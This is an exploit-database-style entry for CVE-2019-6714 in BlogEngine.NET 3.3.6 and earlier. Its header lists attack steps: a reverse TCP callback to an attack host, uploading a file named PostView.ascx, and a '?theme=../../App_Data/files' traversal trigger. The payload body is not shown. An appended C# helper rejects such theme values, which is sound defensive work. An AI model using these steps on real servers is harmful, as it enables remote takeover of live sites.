# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE
# Date: 02-11-2019
# Exploit Author: Dustin Cobb
# Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/
# Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip
# Version: <= 3.3.6
# Tested on: Windows 2016 Standard / IIS 10.0
# CVE : CVE-2019-6714

/*
 * CVE-2019-6714
 *
 * Path traversal vulnerability leading to remote code execution. This
 * vulnerability affects BlogEngine.NET versions 3.3.6 and below. It
 * is caused by an unchecked "theme" parameter that is used to override
 * the default theme for rendering blog pages. The vulnerable code can
 * be seen in this file:
 *
 * /Custom/Controls/PostList.ascx.cs
 *
 * Attack:
 *
 * First, we set the TcpClient address and port within the method below to
 * our attack host, which has a reverse TCP listener waiting for a connection.
 * Next, we upload this file through the file manager. In the current (3.3.6)
 * version of BlogEngine, this is done by editing a post and clicking on the
 * icon that looks like an open file in the toolbar. Note that this file must
 * be uploaded as PostView.ascx. Once uploaded, the file will be in the
 * /App_Data/files directory off of the document root. The admin page that
 * allows upload is:
 *
 * http://10.10.10.10/admin/app/editor/editpost.cshtml
 *
 * Finally, the vulnerability is triggered by accessing the base URL for the
 * blog with a theme override specified like so:
 *
 * http://10.10.10.10/?theme=../../App_Data/files
 *
 */

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
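The defensive counterpart to the unchecked "theme" parameter described above, added here as an example and not code from the exploit or from BlogEngine.NET itself: a theme-resolution helper that accepts only a bare folder name under the themes root and falls back to the default theme otherwise. `ThemeResolver`, `WebRoot`, `ResolveThemePath` and `ThemeOrDefault` are hypothetical names; the web-root path and the theme name "Standard" are constructed sample values.

```csharp
using System;
using System.IO;

// Hypothetical helper, not BlogEngine.NET's own code: the validation that the
// unchecked "theme" parameter described above lacks. A theme is selected by a
// bare folder name and must resolve to a directory directly under Custom\Themes.
public static class ThemeResolver
{
    // Assumed web root of the application (constructed value, not from the advisory).
    public static string WebRoot = @"C:\inetpub\wwwroot\blog";

    // Returns the canonical theme folder path, or null when the requested value
    // is not a plain folder name inside the themes root.
    public static string ResolveThemePath(string requestedTheme, string defaultTheme)
    {
        string themesRoot = Path.GetFullPath(Path.Combine(WebRoot, "Custom", "Themes"))
            .TrimEnd(Path.DirectorySeparatorChar) + Path.DirectorySeparatorChar;
        string name = string.IsNullOrWhiteSpace(requestedTheme) ? defaultTheme : requestedTheme;

        // A theme name is a single folder name: no separators, no ".." components,
        // no characters that are invalid in a file name. This rejects values such as
        // ../../App_Data/files before any path arithmetic happens.
        if (name.IndexOfAny(new[] { '/', '\\' }) >= 0 || name.Contains("..") ||
            name.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0)
            return null;

        // Canonicalise and confirm the result is still under the themes root.
        string candidate = Path.GetFullPath(Path.Combine(themesRoot, name));
        return candidate.StartsWith(themesRoot, StringComparison.OrdinalIgnoreCase)
            ? candidate : null;
    }

    // What page-rendering code would call: an unknown or unsafe theme falls back
    // to the default instead of being used as a raw path for loading PostView.ascx.
    public static string ThemeOrDefault(string requestedTheme, string defaultTheme)
    {
        string path = ResolveThemePath(requestedTheme, defaultTheme);
        if (path != null && Directory.Exists(path))
            return path;
        return ResolveThemePath(defaultTheme, defaultTheme);
    }

    public static void Main()
    {
        // Constructed inputs: a legitimate theme name and the traversal value used above.
        foreach (string theme in new[] { "Standard", "../../App_Data/files", "..\\..\\App_Data\\files" })
        {
            string resolved = ResolveThemePath(theme, "Standard");
            Console.WriteLine("{0,-26} -> {1}", theme, resolved ?? "rejected");
        }
    }
}
```

Only the first input resolves to a path under Custom\Themes; both traversal forms are rejected before any file is touched, so an uploaded PostView.ascx in /App_Data/files can never be selected as a theme.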